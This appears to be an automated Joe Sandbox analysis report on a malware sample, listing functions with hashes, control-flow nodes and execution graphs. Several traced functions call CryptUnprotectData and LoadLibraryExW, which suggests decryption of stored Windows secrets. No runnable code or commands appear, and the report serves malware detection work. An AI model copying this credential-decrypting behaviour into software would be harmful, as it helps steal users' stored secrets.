                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 14bb31b434e81a3395680bc47b80ece7b00672b8b102de1cb67089af4dbd15f6
                                                                                                                                                                                                  • Instruction ID: 9be569efcabddf7384f0b1ed9031dea5a70bbb87f94a99f785b5d07c77e31fd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14bb31b434e81a3395680bc47b80ece7b00672b8b102de1cb67089af4dbd15f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF0E232C0E68C9FEB116F64D9252FABBA0FF56311F4111B6E108A71D3EB28A014875A
                                                                                                                                                                                                  Function 00007FF848F04141 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e05d1510a8574008afc660ed3a9dbbeb009322d0eeaa1386b19b45a34c25a219
                                                                                                                                                                                                  • Instruction ID: 686a11664a11a701948289c6341612c4144153860bf374f62307419b3ac4567d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e05d1510a8574008afc660ed3a9dbbeb009322d0eeaa1386b19b45a34c25a219
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EF0B43185E7899FD397B7308D292E53B50AF57315F4505B9C4088B1D3EF2C54098706
                                                                                                                                                                                                  Function 00007FF848F04E61 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a5807bd336d126f8438c2c92782d9c22d86c194a39a3afb742231161a39b5bd5
                                                                                                                                                                                                  • Instruction ID: b692056d9720041b615d628f822274e2bc530335cf746bfe3bbf188d30fd6a4d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5807bd336d126f8438c2c92782d9c22d86c194a39a3afb742231161a39b5bd5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F0BE3090A61A8FDB089BA498502FEBAB0EF46345F00003ED409B31C2DB2859548A76
                                                                                                                                                                                                  Function 00007FF848F04F54 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f7a938518286229d8d507bce5bd0f2961156277b8509c8d710f210dbb6aff7a9
                                                                                                                                                                                                  • Instruction ID: 0b89ba055f13bcc956f58d799484008d486f5f22a3ebb23fc2de3c2df7b4ef17
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7a938518286229d8d507bce5bd0f2961156277b8509c8d710f210dbb6aff7a9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF0A971915A288FCB94DB58C898AACB7F1FF58310F4041EAD049EB265CA349985CF41
                                                                                                                                                                                                  Function 00007FF848F00B51 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 28ff42b1bd9a1d7d4a0727da97901453d64df2d056e790d30893d76c3c930add
                                                                                                                                                                                                  • Instruction ID: 4c892c8028ea9ea8927bf40551b2718c2d56cbb4fa8aef5013d9e238cfc3903a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28ff42b1bd9a1d7d4a0727da97901453d64df2d056e790d30893d76c3c930add
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE0123059E60A9FD385FB74885A6A979E09F46250B0004BDD009CB1E3EE5C58468B57
                                                                                                                                                                                                  Function 00007FF848F02A03 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7ca92e8902892bd041e85aef21529d3298fe1b4b97b7ed4dcee0e9fca154dfdb
                                                                                                                                                                                                  • Instruction ID: 198a85267b5b9bb3955bede9334364a8314080653de8e35f6c7dbdff87f75c4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ca92e8902892bd041e85aef21529d3298fe1b4b97b7ed4dcee0e9fca154dfdb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECD01222F1DC9B1FD654A76C68456A552C1DB94790F4446B2D10EC3389ED6DA9820381
                                                                                                                                                                                                  Function 00007FF848F008DA Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5e099cc934cea8706ecff2c37027ca87d1ab79c2f24ccc638632745d641f1817
                                                                                                                                                                                                  • Instruction ID: c6cf657ad53f55aab6a6efb9263f709ccb7528535ebdc31ff4d1e8ad8a8ba675
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e099cc934cea8706ecff2c37027ca87d1ab79c2f24ccc638632745d641f1817
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE0D8B040860ECFC780DB68845D6AEBFF5FFA4305B10446ED058D7191E73848428BC2
                                                                                                                                                                                                  Function 00007FF848F0115D Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 300d76d00b5f260ba56e4b2d5c0a017429d122192bc5b6ad2671226cc49ea04d
                                                                                                                                                                                                  • Instruction ID: e1c15b6551589b5fdb781721204b34b2905e7d15bba6f463866dba8be1797b63
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 300d76d00b5f260ba56e4b2d5c0a017429d122192bc5b6ad2671226cc49ea04d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE0EC709586198FE3D1FB2888596A876E0EF4A204F0000FA8409CB1E2EF2458868B46

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 00007FF848F006F0 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: P_^=$P_^>$P_^?$P_^@
                                                                                                                                                                                                  • API String ID: 0-1157690449
                                                                                                                                                                                                  • Opcode ID: bfa64f3af72ff364e4b186f6210787755b4ffe4e352002c5d7ddf7f204488482
                                                                                                                                                                                                  • Instruction ID: c47b6fcdcc31e8b6de318747a445fe9b5293f08618e91aa062cf51eebc138e80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfa64f3af72ff364e4b186f6210787755b4ffe4e352002c5d7ddf7f204488482
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E421A77751A125A9D2107BBDB8856DE3768EF903B8B48473BE0DCCE053DE1C248686A8

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:20%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:21.4%
                                                                                                                                                                                                  Total number of Nodes:14
                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                  execution_graph 7639 7ff848f16bb8 7641 7ff848f16bbf LoadLibraryExW 7639->7641 7642 7ff848f16cbc 7641->7642 7647 7ff848f16208 7648 7ff848f24010 7647->7648 7651 7ff848f16a30 7648->7651 7650 7ff848f24020 7652 7ff848f16a54 7651->7652 7653 7ff848f16c5c LoadLibraryExW 7652->7653 7654 7ff848f16b4b 7652->7654 7655 7ff848f16cbc 7653->7655 7654->7650 7655->7650 7643 7ff848f187d1 7644 7ff848f187ff CryptUnprotectData 7643->7644 7646 7ff848f18a09 7644->7646

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF848F187D1 Relevance: 1.8, APIs: 1, Instructions: 268encryptionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 276 7ff848f187d1-7ff848f18815 278 7ff848f1885f-7ff848f188ae 276->278 279 7ff848f18817-7ff848f1885a 276->279 281 7ff848f188af-7ff848f188f6 278->281 279->278 283 7ff848f188f8-7ff848f188fa 281->283 284 7ff848f18967-7ff848f18975 281->284 285 7ff848f18976-7ff848f18a07 CryptUnprotectData 283->285 286 7ff848f188fc 283->286 284->285 294 7ff848f18a09 285->294 295 7ff848f18a0f-7ff848f18a81 285->295 287 7ff848f1894b-7ff848f18966 286->287 288 7ff848f188fe-7ff848f18912 286->288 287->284 288->281 291 7ff848f18914-7ff848f18943 288->291 291->287 294->295
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.4694321247.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                                                                  • Opcode ID: 751a0fd4c4921480a19f0ebb9179b2ab062c1b03a17213bbefda3546202369b2
                                                                                                                                                                                                  • Instruction ID: ba6e823b4e2f9802b9423168c314a761ea5b07d159c775ccae3942bcf0e4f34e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 751a0fd4c4921480a19f0ebb9179b2ab062c1b03a17213bbefda3546202369b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE913D70D18A5D8FDB98EF18C845BE9B7F1FB59340F0042AAD44DE3291DB74A9848F85
                                                                                                                                                                                                  Function 00007FF848F16A30 Relevance: 1.9, APIs: 1, Instructions: 359libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.4694321247.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: e14974eac5df506715f3f3c2f92699731ce80569c02f0d05bf2a3e89e28bbc7e
                                                                                                                                                                                                  • Instruction ID: 9ddd62eee40d0afb23da92769932c3f5d40b79ee7801273cb747a8f7a68ec844
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e14974eac5df506715f3f3c2f92699731ce80569c02f0d05bf2a3e89e28bbc7e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EA17E30A0CA0D8FDB58EB58D885AB9B7F1FB59315F14416ED04ED3292DB35AC42CB45
                                                                                                                                                                                                  Function 00007FF848F16BB8 Relevance: 1.7, APIs: 1, Instructions: 160libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 378 7ff848f16bb8-7ff848f16c40 382 7ff848f16c5c-7ff848f16cba LoadLibraryExW 378->382 383 7ff848f16c42-7ff848f16c59 378->383 384 7ff848f16cbc 382->384 385 7ff848f16cc2-7ff848f16d14 382->385 383->382 384->385
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000007.00000002.4694321247.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: 2aa59763c50561150e24afc57153c657187af7230d34b4247aee6d209f31097b
                                                                                                                                                                                                  • Instruction ID: caf6adbd15c072883040bf187058ba7c168cd7efbce59631ffa1e5a86b71c512
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2aa59763c50561150e24afc57153c657187af7230d34b4247aee6d209f31097b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F751F670908A1C8FDB98EF98D889BE9BBF1FB69311F10416ED00DE7251DB75A985CB40

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:19.1%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:6
                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                  execution_graph 11855 7ff848f1890d 11856 7ff848f18919 CryptUnprotectData 11855->11856 11858 7ff848f189f9 11856->11858 11859 7ff848f16fa1 11860 7ff848f16fbb LoadLibraryExW 11859->11860 11862 7ff848f170cc 11860->11862

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF848F187C1 Relevance: 1.8, APIs: 1, Instructions: 251encryptionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 844 7ff848f187c1-7ff848f18805 846 7ff848f1884f-7ff848f188e6 844->846 847 7ff848f18807-7ff848f1884a 844->847 850 7ff848f188e8-7ff848f188ec 846->850 851 7ff848f18957-7ff848f1896c 846->851 847->846 853 7ff848f1893b-7ff848f18956 850->853 854 7ff848f188ee-7ff848f18908 850->854 855 7ff848f18974-7ff848f189f7 CryptUnprotectData 851->855 853->851 854->853 857 7ff848f189f9 855->857 858 7ff848f189ff-7ff848f18a71 855->858 857->858
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2451531052.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                                                                  • Opcode ID: cb4b45cd52cab08c61b5b3a6e2664e7da16dd33d04a5d2a79d460aaee70ef367
                                                                                                                                                                                                  • Instruction ID: ed31ff488ff7394f321bbe50d0ec8ee43e65aff3c90e498e397349225eebf992
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb4b45cd52cab08c61b5b3a6e2664e7da16dd33d04a5d2a79d460aaee70ef367
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8815A70D18A5D8FDB98EF18C845BE9BBF1FB59300F4042AAD44DE3291DB74A9848F85
                                                                                                                                                                                                  Function 00007FF848F1890D Relevance: 1.6, APIs: 1, Instructions: 118encryptionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 979 7ff848f1890d-7ff848f189f7 CryptUnprotectData 984 7ff848f189f9 979->984 985 7ff848f189ff-7ff848f18a71 979->985 984->985
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2451531052.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                                                                  • Opcode ID: 51492efc139d7a8c63d5268c124e20cb355a901a00e8cc78078580f4c98fd23d
                                                                                                                                                                                                  • Instruction ID: 7e76842ea597c54a5a2b9fe3068cd1cb69b895e4b600983f72838ceb5313fd84
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51492efc139d7a8c63d5268c124e20cb355a901a00e8cc78078580f4c98fd23d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1641A870D19A1D8FDBA4EF18C885BE9B7B1FB59300F0042A9D44DE3255DB74AA84CF45
                                                                                                                                                                                                  Function 00007FF848F16FA1 Relevance: 1.7, APIs: 1, Instructions: 179libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 863 7ff848f16fa1-7ff848f16fb9 864 7ff848f16fbb 863->864 865 7ff848f16fbc-7ff848f17050 863->865 864->865 869 7ff848f1706c-7ff848f170ca LoadLibraryExW 865->869 870 7ff848f17052-7ff848f17069 865->870 871 7ff848f170cc 869->871 872 7ff848f170d2-7ff848f17124 869->872 870->869 871->872
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2451531052.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: 747f666f1121363f4e4793babbb3d732a10175cc748a728a5ec8a4b624158102
                                                                                                                                                                                                  • Instruction ID: fadd224a6fa377a62f339fcff816673e8c66b74479acde88ec2bdbb26477251d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 747f666f1121363f4e4793babbb3d732a10175cc748a728a5ec8a4b624158102
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3516D70908A5C8FDB98EF98D889BE9BBF0FB59311F0041AED00DE7252DB759985CB40

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:16%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:17
                                                                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                                                                  execution_graph 3125 7ff848f26e29 3126 7ff848f26e3c 3125->3126 3127 7ff848f2706c LoadLibraryExW 3126->3127 3128 7ff848f26f5b 3126->3128 3129 7ff848f270cc 3127->3129 3130 7ff848f25773 3132 7ff848f26fd0 LoadLibraryExW 3130->3132 3133 7ff848f270cc 3132->3133 3115 7ff848f29bf6 3116 7ff848f29c1f 3115->3116 3119 7ff848f26e40 3116->3119 3118 7ff848f29c30 3122 7ff848f26e64 3119->3122 3120 7ff848f26f5b 3120->3118 3121 7ff848f2706c LoadLibraryExW 3124 7ff848f270cc 3121->3124 3122->3120 3122->3121 3123 7ff848f26f78 3122->3123 3123->3118 3124->3118

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF848F26E29 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 367COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000028.00000002.2642705866.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_40_2_7ff848f20000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: -H
                                                                                                                                                                                                  • API String ID: 0-3863854644
                                                                                                                                                                                                  • Opcode ID: d70cd073b5f691afd6a3fbe8f9c60a564221b497f4c716334c6fd6902f4a1b7b
                                                                                                                                                                                                  • Instruction ID: f2d37142b1c3e316729874b60b759f954fa2aabbd918fb68ad29d0553fe92688
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d70cd073b5f691afd6a3fbe8f9c60a564221b497f4c716334c6fd6902f4a1b7b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BB1C03090CA5D8FDB59EB58D885AB8BBF0FF59310F14016EC04DC72A2DB39A846CB45
                                                                                                                                                                                                  Function 00007FF848F25773 Relevance: 1.7, APIs: 1, Instructions: 159libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 338 7ff848f25773-7ff848f27050 342 7ff848f2706c-7ff848f270ca LoadLibraryExW 338->342 343 7ff848f27052-7ff848f27069 338->343 344 7ff848f270cc 342->344 345 7ff848f270d2-7ff848f27124 342->345 343->342 344->345
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000028.00000002.2642705866.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_40_2_7ff848f20000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: dc2e4a9722c295b5ad242a23f825614df0ecba72c1d4ca167f386fe092e8167e
                                                                                                                                                                                                  • Instruction ID: dd6203718791b4aa07659a5127b89fe56e4fbf48e75930f0e129fcd2cdba3dac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2e4a9722c295b5ad242a23f825614df0ecba72c1d4ca167f386fe092e8167e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84510970908A1C8FDB98EF98D889BE9BBF1FB69311F10416ED00DE7651DB75A885CB40

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 023B0B88 Relevance: 2.0, Strings: 1, Instructions: 797COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: dwq
                                                                                                                                                                                                  • API String ID: 0-1204298229
                                                                                                                                                                                                  • Opcode ID: 41edcb42aaec2ccf4402b51cda41e374e234b16e0a430936e101390c898a0189
                                                                                                                                                                                                  • Instruction ID: 4345560854dc7b284cb39311c83728fd8b2a1e4619a53b4daa980c47843b9f35
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41edcb42aaec2ccf4402b51cda41e374e234b16e0a430936e101390c898a0189
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C829274E00229CFCB25DFA8D894BDDB7B5BF49304F1085AAD509AB365DB30AA85CF50
                                                                                                                                                                                                  Function 023B06A4 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 7cc1b5c28d3ac1f9e2faceb2cfeb423bc060b63ec014304bfc92c586634fd18d
                                                                                                                                                                                                  • Instruction ID: b278adaee8eac155dd6da9f184e50c9b748205303d398dc5565e2f341ab5ba9c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cc1b5c28d3ac1f9e2faceb2cfeb423bc060b63ec014304bfc92c586634fd18d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B43164B0900205DFCB06EFE4E894A9D7FF1FB45308F40599AD004AB276EB755A4AEF81
                                                                                                                                                                                                  Function 023B0848 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
